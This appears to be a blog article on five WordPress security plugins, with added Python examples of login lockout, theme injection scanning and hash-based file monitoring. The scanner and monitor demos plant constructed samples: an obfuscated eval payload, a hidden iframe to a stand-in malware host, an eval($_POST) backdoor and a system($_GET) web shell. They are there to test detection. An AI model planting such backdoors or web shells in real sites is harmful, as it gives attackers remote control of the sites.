WordPress, like any other popular script or online service, is heavily targeted by attackers who try to gain access to installations so that they can use the hijacked blogs for their own purposes.
This includes displaying ads to the blog's visitors, placing links to their sites on the blog, or even redirecting the whole blog to another site.
WordPress administrators can improve the security of their blog with several standard practices, like selecting a secure password, changing the default admin username, or disabling features they do not need (such as user registration or remote publishing).
But there are also WordPress plugins that can increase a blog's security considerably. The following list contains five WordPress plugins that improve a blog's security.
1. Login Lockdown
Login Lockdown increases the protection against so-called brute force attacks, in which an attacker tries many username and password combinations in quick succession. The plugin logs every login attempt and blocks further attempts from IP addresses that fail repeatedly within a short period of time.
The number of login retries, the retry time interval and the length of the lockout can be configured in the plugin's options.
The list of blocked IP addresses also shows the webmaster whether an attack is currently underway. Keep in mind that the block is keyed on the source IP address: an attacker who spreads the attempts over many addresses is not stopped, and several legitimate users behind one shared address can be locked out together.
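The lockout logic described above, as an added example (this is not the plugin's code): a sliding window of failed attempts per IP address, with the plugin's three options as parameters. Timestamps are passed in explicitly so the behaviour can be checked without waiting; the IP addresses and the scenario in `demo()` are constructed.

```python
"""Sliding-window login lockout in the style of Login Lockdown.

Added example, not the plugin's code. The three constructor parameters
correspond to the plugin's options: allowed retries, the retry time
interval and the length of the lockout. Timestamps are passed in
explicitly; a real implementation would use time.time().
"""
from collections import defaultdict, deque


class LoginLockdown:
    def __init__(self, max_retries=3, retry_window=300, lockout_length=3600):
        self.max_retries = max_retries        # failed attempts allowed per window
        self.retry_window = retry_window      # seconds in which those failures must occur
        self.lockout_length = lockout_length  # seconds an IP stays blocked
        self._failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self._locked_until = {}               # ip -> time at which the lock expires
        self.log = []                         # every attempt, blocked ones included

    def is_locked(self, ip, now):
        until = self._locked_until.get(ip)
        if until is None:
            return False
        if now >= until:                      # lock expired: forget it and start fresh
            del self._locked_until[ip]
            self._failures.pop(ip, None)
            return False
        return True

    def attempt(self, ip, username, password_ok, now):
        """Record one login attempt; return True only if the login is allowed."""
        self.log.append({"time": now, "ip": ip, "user": username, "ok": password_ok})
        if self.is_locked(ip, now):
            return False                      # even a correct password is refused while locked
        if password_ok:
            self._failures.pop(ip, None)      # a successful login clears the failure history
            return True
        window = self._failures[ip]
        window.append(now)
        while window and now - window[0] > self.retry_window:
            window.popleft()                  # drop failures older than the retry interval
        if len(window) >= self.max_retries:
            self._locked_until[ip] = now + self.lockout_length
            window.clear()
        return False

    def blocked_ips(self, now):
        """The list an admin would look at to spot an attack in progress."""
        return sorted(ip for ip, until in self._locked_until.items() if until > now)


def demo():
    """Constructed scenario: one attacker and one forgetful but legitimate user."""
    ld = LoginLockdown(max_retries=3, retry_window=300, lockout_length=3600)
    attacker, user = "203.0.113.5", "198.51.100.7"   # constructed addresses
    return {
        "attacker_failures": [ld.attempt(attacker, "admin", False, t) for t in (0, 10, 20)],
        "attacker_locked_at_30": ld.is_locked(attacker, 30),
        "attacker_correct_pw_while_locked": ld.attempt(attacker, "admin", True, 30),
        # three failures spread over 800 s never fall inside one 300 s window
        "user_slow_failures": [ld.attempt(user, "editor", False, t) for t in (0, 400, 800)],
        "user_locked": ld.is_locked(user, 800),
        "user_success": ld.attempt(user, "editor", True, 810),
        "blocked_at_900": ld.blocked_ips(900),
        "attacker_after_lockout": ld.attempt(attacker, "admin", True, 3700),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two details matter in practice: the correct password is refused while the lock is active (otherwise the lockout would only slow an attacker down until the right guess), and the IP address must come from the real client connection. Behind a reverse proxy the web server sees the proxy's address, and a forwarded header is only trustworthy if that proxy sets it.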
2. WP Security Scan
WP Security Scan checks several key elements of the blog: the WordPress version, the database table prefix, whether the WordPress version is hidden on public pages, whether database error reporting is turned off, whether the ID meta tag has been removed, whether a user named admin exists, and whether a .htaccess file has been placed in wp-admin for extra protection.
It can furthermore scan the file permissions of the core WordPress folders (showing the permissions it suggests next to the actual ones), change the database table prefix away from the default wp_ (which blunts automated SQL injection attacks that assume the default prefix, but is no substitute for keeping the installation updated), and provides access to a password strength checker. The plugin does not need to be active all the time; it is useful while hardening the blog and can be deactivated afterwards.
3. Antivirus for WordPress
Antivirus for WordPress scans the active theme's files for malicious injections, which protects the blog against certain forms of exploits and spam injections. It runs in the background and can be configured to notify the admin if a scan finds an anomaly in the theme files.
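To make concrete what a theme scan looks for, here is an added example (not the plugin's code) that walks a theme folder and reports lines matching common injection signatures: `eval`, `base64_decode`, decompression functions used to hide payloads, user input passed straight into `include`, and hidden iframes. The rule names, the sample theme files and the `malware.example` host are constructed for the example; a hit is an anomaly for a human to review, not proof of infection.

```python
"""Signature scan of a theme folder for common injection patterns.

Added example, not the code of Antivirus for WordPress. The patterns are
typical of spam and backdoor injections found in compromised themes.
Legitimate code can match too (base64_decode has honest uses), so the
output is a review list, not a verdict.
"""
import os
import re
import tempfile
from pathlib import Path

SCAN_EXTENSIONS = {".php", ".js", ".html", ".htm"}

# (rule name, pattern); rule names are chosen for this example
RULES = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("decompress/obfuscate", re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("user input passed to include",
     re.compile(r"\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("hidden iframe", re.compile(r"<iframe[^>]*display\s*:\s*none", re.IGNORECASE)),
]


def scan_file(path, rel_name):
    """Return one finding per (line, rule) match in a single file."""
    findings = []
    try:
        text = Path(path).read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append({"file": rel_name, "line": lineno,
                                 "rule": name, "snippet": line.strip()[:80]})
    return findings


def scan_theme(theme_dir):
    """Scan every script or markup file below theme_dir."""
    findings = []
    for dirpath, _, filenames in os.walk(theme_dir):
        for fn in sorted(filenames):
            if Path(fn).suffix.lower() in SCAN_EXTENSIONS:
                full = os.path.join(dirpath, fn)
                findings.extend(scan_file(full, os.path.relpath(full, theme_dir)))
    return findings


def build_sample_theme():
    """Constructed theme: a clean functions.php and a footer.php with an injection."""
    d = Path(tempfile.mkdtemp(prefix="theme-"))
    (d / "functions.php").write_text(
        "<?php\n"
        "add_action('wp_enqueue_scripts', function () {\n"
        "    wp_enqueue_style('theme-style', get_stylesheet_uri());\n"
        "});\n")
    (d / "footer.php").write_text(
        "<?php wp_footer(); ?>\n"
        "</body></html>\n"
        "<?php eval(base64_decode('ZWNobyAnc3BhbSc7')); ?>\n"   # obfuscated payload
        "<div><iframe src=\"http://malware.example/x\" style=\"display:none\"></iframe></div>\n")
    return str(d)


if __name__ == "__main__":
    for f in scan_theme(build_sample_theme()):
        print(f"{f['file']}:{f['line']} [{f['rule']}] {f['snippet']}")
```

Injections typically land at the very end of footer.php or functions.php, after the closing `?>`, where a quick look in the theme editor does not reach; scanning line by line rather than eyeballing the file is the point.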
4. WordPress File Monitor
Note: The plugin has not been updated since 2010. I was not able to find a comparable plugin that is updated regularly. While the plugin may still work in recent versions of WordPress, I suggest you try it in a local environment first to make sure it does.
The plugin monitors the files of a WordPress blog and notifies the webmaster if any of them have been changed. It can detect changes either by checking file modification dates or by comparing file hashes; the hash comparison is slower but cannot be fooled by an attacker who resets a file's modification time after editing it.
Folders can be excluded from the scan, which is important for cache folders, for instance, whose files change regularly and would otherwise trigger an alert on every scan.
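The hash-based variant with excluded folders, as an added example (not the plugin's code): take a baseline of SHA-256 hashes, rescan later, and report added, removed and modified files. The `demo()` function builds a constructed WordPress-like tree, tampers with it, and resets the modification time of the edited file to show why hashes are preferable to dates.

```python
"""Hash-based file change monitor with excluded folders.

Added example, not WordPress File Monitor's code. Content hashes are
compared rather than modification times because an attacker who edits a
file can also put its mtime back (touch -r), whereas the hash changes
regardless.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, exclude=()):
    """Map every file under root (minus excluded folders) to its SHA-256."""
    root = Path(root)
    excluded = {Path(e).as_posix() for e in exclude}   # relative folder paths
    hashes = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root).as_posix()
        # prune excluded folders in place so os.walk does not descend into them
        dirnames[:] = [d for d in dirnames
                       if (d if rel_dir == "." else f"{rel_dir}/{d}") not in excluded]
        for name in filenames:
            full = Path(dirpath) / name
            hashes[full.relative_to(root).as_posix()] = sha256_file(full)
    return hashes


def compare(baseline, current):
    """Report what changed between two snapshots."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def demo():
    """Constructed WordPress-like tree: take a baseline, tamper, rescan."""
    root = Path(tempfile.mkdtemp(prefix="wp-"))
    files = {
        "wp-config.php": "<?php define('DB_NAME', 'wp');\n",
        "wp-includes/version.php": "<?php $wp_version = '3.0';\n",
        "wp-content/themes/twentyten/functions.php": "<?php // theme\n",
        "wp-content/cache/page.html": "<html>cached</html>\n",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    exclude = ("wp-content/cache",)
    baseline = build_baseline(root, exclude)

    # Simulated compromise: backdoor appended to wp-config.php, mtime put back,
    # a web shell dropped into uploads, plus ordinary cache churn.
    cfg = root / "wp-config.php"
    before = cfg.stat()
    cfg.write_text(files["wp-config.php"] + "eval($_POST['c']);\n")
    os.utime(cfg, ns=(before.st_atime_ns, before.st_mtime_ns))
    (root / "wp-content/uploads").mkdir()
    (root / "wp-content/uploads/shell.php").write_text("<?php system($_GET['cmd']);\n")
    (root / "wp-content/cache/page.html").write_text("<html>regenerated</html>\n")

    return {
        "report": compare(baseline, build_baseline(root, exclude)),
        # an mtime-only check would see nothing wrong with wp-config.php
        "mtime_looks_untouched": cfg.stat().st_mtime_ns == before.st_mtime_ns,
    }


if __name__ == "__main__":
    print(demo())
```

Store the baseline somewhere the web server cannot write to (outside the document root, or off the machine entirely); a baseline the attacker can overwrite alongside the files it describes is worthless.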
5. Secure WordPress
The plugin performs a series of one-time hardening operations on the WordPress blog, specifically:
1. removes error information from the login page (so a failed login does not reveal whether the username exists)
2. adds a virtual index.php to the plugin directory (to prevent directory listing)
3. removes the WordPress version from the pages, except in the admin area
4. removes the Really Simple Discovery (RSD) link
5. removes the Windows Live Writer link
6. removes core update information for non-admins
7. removes plugin update information for non-admins
8. removes theme update information for non-admins (only WP 2.8 and higher)
9. hides the WordPress version in the backend dashboard for non-admins
10. adds a string for use with WP Scanner
11. blocks bad queries (requests whose URL contains typical attack strings)
Secure WordPress can be downloaded from the official WordPress Plugin repository.